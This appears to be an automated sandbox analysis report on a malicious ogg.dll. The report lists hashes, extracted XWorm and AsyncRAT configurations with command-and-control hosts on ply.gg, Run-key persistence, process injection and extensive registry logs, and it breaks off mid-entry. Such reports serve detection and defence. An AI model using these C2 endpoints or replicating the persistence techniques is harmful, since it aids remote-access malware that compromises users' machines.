Analysis
-
max time kernel
1226s -
max time network
1228s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
22-06-2024 05:58
Static task
static1
Errors
General
-
Target
ogg.dll
-
Size
36KB
-
MD5
0602f672ba595716e64ec4040e6de376
-
SHA1
b00735e08b821aa9fc5850084ae057b5f618fb2a
-
SHA256
4a4f65427e016b3c5ae0d2517a69db5f1cdc7a43d2c0a7957e8da5d6f378f063
-
SHA512
9c03bc45c6bfc9f323802813a040992789b99cb961bf43b6e7536e3a379e3c22ea2fc86998c005c6ff1264f6081458a8de9c827a5f5d6a9c065ad7484e796ede
-
SSDEEP
384:NXdNw/aVFvp0mOn4bM/ey7mlDHloAuTEmoq4NEywNJpTo90eTR2F:XNbFB0lv/ehuTEX7NEtbTo93TY
Malware Config
Extracted
xworm
politics-fiber.gl.at.ply.gg:47430
-
Install_directory
%AppData%
-
install_file
$77-scchost.exe
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe family_xworm behavioral1/memory/4608-465-0x0000000000E50000-0x0000000000E62000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 6964 created 640 6964 powershell.EXE winlogon.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe family_asyncrat -
Downloads MZ/PE file
-
Executes dropped EXE 28 IoCs
Processes:
Dropper Builder.exe$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-install.exe$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-scchost.exe$77-scchost.exe7z.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exe$77-scchost.exepid process 9052 Dropper Builder.exe 4608 $77-sdchost.exe 7108 $77-aachost.exe 6656 $77-penisballs.exe 7188 $77-install.exe 7224 $77-sdchost.exe 7332 $77-aachost.exe 5076 $77-penisballs.exe 4640 $77-scchost.exe 4508 $77-scchost.exe 6312 7z.exe 6444 $77-scchost.exe 2248 $77-scchost.exe 3904 $77-scchost.exe 1476 $77-scchost.exe 5676 $77-scchost.exe 6292 $77-scchost.exe 7188 $77-scchost.exe 6020 $77-scchost.exe 6304 $77-scchost.exe 8968 $77-scchost.exe 6904 $77-scchost.exe 1052 $77-scchost.exe 1644 $77-scchost.exe 7672 $77-scchost.exe 3900 $77-scchost.exe 5032 $77-scchost.exe 9124 $77-scchost.exe -
Loads dropped DLL 1 IoCs
Processes:
7z.exepid process 6312 7z.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
$77-sdchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" $77-sdchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Drops file in System32 directory 20 IoCs
Processes:
powershell.EXE$77-aachost.exe$77-sdchost.exesvchost.exesvchost.exe$77-penisballs.exeOfficeClickToRun.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe $77-aachost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe $77-sdchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf $77-penisballs.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\$77-scchost svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log $77-aachost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 6964 set thread context of 7456 6964 powershell.EXE dllhost.exe -
Drops file in Windows directory 11 IoCs
Processes:
7z.exesvchost.exe$77-sdchost.exedescription ioc process File opened for modification C:\Windows\Resources\xworm fixed\1 7z.exe File created C:\Windows\Resources\xworm fixed\2 7z.exe File opened for modification C:\Windows\Resources\xworm fixed\2 7z.exe File created C:\Windows\Resources\xworm fixed\3 7z.exe File opened for modification C:\Windows\Resources\xworm fixed\3 7z.exe File created C:\Windows\Resources\xworm fixed\4 7z.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File created C:\Windows\Resources\xworm fixed\1 7z.exe File created C:\Windows\Resources\xworm fixed\0 7z.exe File opened for modification C:\Windows\Resources\xworm fixed\0 7z.exe File created C:\Windows\Resources\xworm fixed.zip $77-sdchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1576 2780 WerFault.exe rundll32.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exewmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 7432 timeout.exe 1312 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
wmiprvse.exewmiprvse.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Processes:
Explorer.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
LogonUI.exechrome.exepowershell.EXE$77-penisballs.exedllhost.exe$77-aachost.exeOfficeClickToRun.exe$77-sdchost.execmd.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133635095582291813" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309dbb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates $77-penisballs.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" $77-aachost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" $77-aachost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates $77-penisballs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ $77-sdchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000b386e46e69c4da01 cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs $77-penisballs.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot $77-penisballs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000038fb036c69c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E61BF828-5E63-4287-BEF1-60B1A4FDE0E3} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000004aff016c69c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My $77-penisballs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000074f1f56b69c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000006821f26b69c4da01 dllhost.exe -
Modifies registry class 64 IoCs
Processes:
Explorer.EXEDropper Builder.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000900444648b4cd1118b70080036b11a030300000078000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\LogicalViewMode = "3" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Mode = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Videos" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot = "4" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Vid = "{0057D0E0-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByDirection = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByKey:PID = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133626137163497364" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local 